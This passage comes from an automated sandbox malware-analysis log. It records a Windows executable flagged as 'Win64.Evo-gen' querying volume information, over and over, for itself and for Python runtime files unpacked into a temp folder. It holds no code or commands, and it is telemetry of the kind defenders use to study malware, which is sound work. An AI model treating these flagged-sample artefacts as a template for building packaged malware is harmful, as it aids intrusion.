            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\libcrypto-1_1.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\libffi-8.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\libssl-1_1.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\sqlite3.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd VolumeInformationJump to behavior
